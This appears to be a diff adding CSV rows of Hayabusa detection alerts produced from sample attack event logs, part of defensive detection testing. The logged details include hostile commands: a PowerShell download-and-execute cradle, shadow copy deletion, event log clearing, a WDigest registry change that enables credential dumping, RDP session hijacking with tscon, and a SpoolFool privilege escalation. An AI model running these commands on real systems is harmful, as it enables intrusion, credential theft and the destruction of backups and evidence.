+2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx
+2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx
+2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
+2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
+2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx
+2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,{$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Shadowcopy"" CommandInvocation(ForEach-Object): ""ForEach-Object"" ParameterBinding(ForEach-Object): name=""Process""; value=""$_.Delete();""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2021-12-20 00:13:49.041 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
+2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx
+2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
+2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
+2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
+2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
+2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
+2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
+2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
+2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
+2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
+2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,../hayabusa-rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-02-09 05:33:10.918 +09:00,wef.windomain.local,4697,info,Persis,Service Installed,Name: rdphijack2 | Path: cmd.exe /k tscon 2 /dest rdp-tcp#14 | User: user | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1945c67,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
+2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
+2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
+2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
+2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx